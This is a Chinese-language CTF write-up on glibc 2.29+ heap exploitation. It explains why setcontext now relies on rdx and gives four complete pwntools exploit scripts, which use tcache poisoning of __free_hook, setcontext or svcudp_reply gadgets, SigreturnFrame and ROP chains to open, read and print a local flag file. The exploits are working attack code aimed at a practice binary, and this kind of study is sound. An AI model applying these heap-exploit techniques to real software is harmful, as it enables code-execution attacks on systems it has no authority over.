从 libc-2.29 版本起,setcontext 改用 rdx 寄存器来访问 SigreturnFrame 结构,因此无法直接利用 setcontext 的 gadget 将 free 的 SigreturnFrame 结构赋值给寄存器。
目录
一、利用gadget
可以先泄露堆地址,然后通过下面两条 gadget 中的一条将释放的 chunk 的内存地址赋值给 rdx 然 后跳转到 setcontext 的 gadget 。
mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;
mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];
(一)利用第一条gadget
# 利用第一种gadget
from pwn import *
elf=ELF('./pwn_')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'
io=process('./pwn_')
def add(index,size):
io.sendlineafter(b'choice:\n',b'1')
io.sendlineafter(b'index:\n',str(index).encode())
io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
io.sendlineafter(b'choice:\n',b'2')
io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
io.sendlineafter(b'choice:\n',b'3')
io.sendlineafter(b'index',str(index).encode())
io.sendlineafter(b'length:\n',str(length).encode())
io.sendafter(b'content:\n',content)
def show(index):
io.sendlineafter(b'choice:\n',b'4')
io.sendlineafter(b'index:\n',str(index).encode())
### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x3b6be0
success("libc base: "+hex(libc.address))
success("free hook: "+hex(libc.sym['__free_hook']))
### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)
# setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov rax, [rdi]; mov rdi, rdx; jmp rax;'),executable=True).__next__()
flag_addr=libc.sym['__free_hook']+0x100
frame_addr=libc.sym['__free_hook']+0x120
buf_addr=libc.sym['__free_hook']+0x200
# read(3,buf,0x20)
ROP_chain=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx;ret'),executable=True).__next__())
ROP_chain+=p64(0x20)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])
payload=b''
payload+=p64(gadget_addr)
payload+=ROP_chain
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x120,b'\x00')
frame=SigreturnFrame()
frame.rdi=flag_addr
frame.rip=libc.sym['open']
frame.rsp=libc.sym['__free_hook']+0x8
payload+=bytes(frame)
edit(0,len(payload),payload)
edit(1,0x10,p64(libc.sym['setcontext']+53)+p64(frame_addr))
success(hex(frame_addr))
gdb.attach(io,'b free\nc')
sleep(0.5)
delete(1)
io.interactive()
(二)利用第二条gadget
1、不需要泄露堆地址
# 利用第二种gadget,不需要leak堆地址
from pwn import *
elf=ELF('./pwn')
libc=ELF('/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/libc-2.31.so')
context.arch=elf.arch
context.log_level='debug'
io=process('./pwn')
def add(index,size):
io.sendlineafter(b'choice:\n',b'1')
io.sendlineafter(b'index:\n',str(index).encode())
io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
io.sendlineafter(b'choice:\n',b'2')
io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
io.sendlineafter(b'choice:\n',b'3')
io.sendlineafter(b'index',str(index).encode())
io.sendlineafter(b'length:\n',str(length).encode())
io.sendafter(b'content:\n',content)
def show(index):
io.sendlineafter(b'choice:\n',b'4')
io.sendlineafter(b'index:\n',str(index).encode())
gdb.attach(io)
### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1ecbe0
success("libc base: "+hex(libc.address))
### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
## 不需要泄露堆指针的方法
# show(0)
# heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
# success("heap base: "+hex(heap_base))
edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)
### setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];'),executable=True).__next__()
payload_addr=libc.sym['__free_hook']
ROP_addr=payload_addr+0x8
flag_addr=payload_addr+0x100
frame_addr=payload_addr+0x120
buf_addr=payload_addr+0x200
ROP_chain=b''
# read(3,buf,0x20)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx ; pop rbx ; ret'),executable=True).__next__()) #所选libc没有直接的pop rdx;ret
ROP_chain+=p64(0x20)
ROP_chain+=p64(0)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])
payload=b''
payload+=p64(gadget_addr)
payload+=ROP_chain
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x120,b'\x00')
frame=SigreturnFrame()
# open("./flag")
frame.rdi=flag_addr
frame.rip=libc.sym['open']
frame.rsp=payload_addr+0x8
frame=bytearray(frame.__bytes__())
frame[0x20:0x20+8]=p64(libc.sym['setcontext']+61)
payload+=bytes(frame)
edit(0,len(payload),payload)
edit(1,0x10,b'a'*8+p64(frame_addr))
# pause()
delete(1)
io.interactive()
2、需要泄露堆地址
# 利用第二种gadget,但是需要leak堆地址
from pwn import *
elf=ELF('./pwn')
libc=ELF('/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/libc-2.31.so')
context.arch=elf.arch
context.log_level='debug'
io=process('./pwn')
def add(index,size):
io.sendlineafter(b'choice:\n',b'1')
io.sendlineafter(b'index:\n',str(index).encode())
io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
io.sendlineafter(b'choice:\n',b'2')
io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
io.sendlineafter(b'choice:\n',b'3')
io.sendlineafter(b'index',str(index).encode())
io.sendlineafter(b'length:\n',str(length).encode())
io.sendafter(b'content:\n',content)
def show(index):
io.sendlineafter(b'choice:\n',b'4')
io.sendlineafter(b'index:\n',str(index).encode())
gdb.attach(io)
### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1ecbe0
success("libc base: "+hex(libc.address))
### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
show(0)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success("heap base: "+hex(heap_base))
edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)
### setcontext+gadget ROP
# mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];
gadget_addr=libc.search(asm('mov rdx, [rdi+0x8]; mov [rsp], rax; call qword ptr [rdx+0x20];'),executable=True).__next__()
info(hex(gadget_addr))
payload=b''
payload+=p64(gadget_addr)
# read(3,add,0x20)
payload+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
payload+=p64(3)
payload+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
payload+=p64(libc.sym['__free_hook']+0x108)
payload+=p64(libc.search(asm('pop rdx ; pop rbx ; ret'),executable=True).__next__()) #所选libc没有直接的pop rdx;ret
payload+=p64(0x20)
payload+=p64(0)
payload+=p64(libc.sym['read'])
# puts(add)
payload+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
payload+=p64(libc.sym['__free_hook']+0x108)
payload+=p64(libc.sym['puts'])
payload=payload.ljust(0x100,b'\x00')
payload+=b'./flag\x00'
edit(0,len(payload),payload)
#open("./flag")
frame=SigreturnFrame()
frame.rdi=libc.sym['__free_hook']+0x100
frame.rip=libc.sym['open']
frame.rsp=libc.sym['__free_hook']+0x8
frame=bytearray(frame.__bytes__())
chunk_addr=heap_base+0x2a0
frame[0x8:0x10]=p64(chunk_addr)
frame[0x20:0x28]=p64(libc.sym['setcontext']+61)
edit(1,len(bytes(frame)),bytes(frame))
pause()
delete(1)
print(frame)
io.interactive()
二、平替setcontext
可以看到,setcontext gadget帮助我们完成了栈迁移和执行流的劫持。如果有其他gadget,也可以做到栈迁移和劫持执行流,那么也就可以平替setcontext
有这样一个gadget(在某些特定libc版本下存在):
0x7ffff7923f36 <svcudp_reply+22> mov rbp, qword ptr [rdi + 0x48]
0x7ffff7923f3a <svcudp_reply+26> mov rax, qword ptr [rbp + 0x18]
0x7ffff7923f3e <svcudp_reply+30> lea r12, [rbp + 0x10]
0x7ffff7923f42 <svcudp_reply+34> mov dword ptr [rbp + 0x10], 0
0x7ffff7923f49 <svcudp_reply+41> mov rdi, r12
0x7ffff7923f4c <svcudp_reply+44> call qword ptr [rax + 0x28]
可以设想,当我们释放一个堆块触发__free_hook时,堆块偏移0x48的位置写rbp,然后rbp偏移0x18的地方写rax,再rax偏移0x28的地方写"leave;ret"的地址,就可以实现栈迁移。
图参考自看雪
我是这么布局的 :
# 利用svcudp_reply gadget
from pwn import *
elf=ELF('./pwn_')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'
io=process('./pwn_')
def add(index,size):
io.sendlineafter(b'choice:\n',b'1')
io.sendlineafter(b'index:\n',str(index).encode())
io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
io.sendlineafter(b'choice:\n',b'2')
io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
io.sendlineafter(b'choice:\n',b'3')
io.sendlineafter(b'index',str(index).encode())
io.sendlineafter(b'length:\n',str(length).encode())
io.sendafter(b'content:\n',content)
def show(index):
io.sendlineafter(b'choice:\n',b'4')
io.sendlineafter(b'index:\n',str(index).encode())
gdb.attach(io)
### leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x3b6be0
success("libc base: "+hex(libc.address))
### tcache poisoning
add(0,0x3f8)
add(1,0x3f8)
delete(1)
delete(0)
edit(0,0x8,p64(libc.sym['__free_hook']))
add(1,0x3f8)
add(0,0x3f8)
'''
0x7ffff7923f36 <svcudp_reply+22> mov rbp, qword ptr [rdi + 0x48]
0x7ffff7923f3a <svcudp_reply+26> mov rax, qword ptr [rbp + 0x18]
0x7ffff7923f3e <svcudp_reply+30> lea r12, [rbp + 0x10]
0x7ffff7923f42 <svcudp_reply+34> mov dword ptr [rbp + 0x10], 0
0x7ffff7923f49 <svcudp_reply+41> mov rdi, r12
0x7ffff7923f4c <svcudp_reply+44> call qword ptr [rax + 0x28]
'''
rbp=libc.sym['__free_hook']
rax=libc.sym['__free_hook']+0x100
flag_addr=libc.sym['__free_hook']+0x150
buf_addr=libc.sym['__free_hook']+0x200
payload=p64(libc.sym['svcudp_reply']+22)
# 0x0000000000022aa0 : pop rsi ; pop r15 ; ret
payload+=p64(libc.search(asm('pop rsi ; pop r15 ; ret'),executable=True).__next__())
payload=payload.ljust(0x18,b'\x00')
payload+=p64(rax)
ROP_chain=b''
# open('./flag')
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(flag_addr)
ROP_chain+=p64(libc.sym['open'])
# read(3,buf,0x20)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(3)
ROP_chain+=p64(libc.search(asm('pop rsi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.search(asm('pop rdx;ret'),executable=True).__next__())
ROP_chain+=p64(0x20)
ROP_chain+=p64(libc.sym['read'])
# puts(buf)
ROP_chain+=p64(libc.search(asm('pop rdi;ret'),executable=True).__next__())
ROP_chain+=p64(buf_addr)
ROP_chain+=p64(libc.sym['puts'])
payload+=ROP_chain
payload=payload.ljust(0x100+0x28,b'\x00')
payload+=p64(libc.search(asm("leave;ret"),executable=True).__next__())
payload=payload.ljust(0x150,b'\x00')
payload+=b'./flag\x00'
payload=payload.ljust(0x200,b'\x00')
edit(0,len(payload),payload)
edit(1,0x50,b'a'*0x48+p64(rbp))
pause()
delete(1)
io.interactive()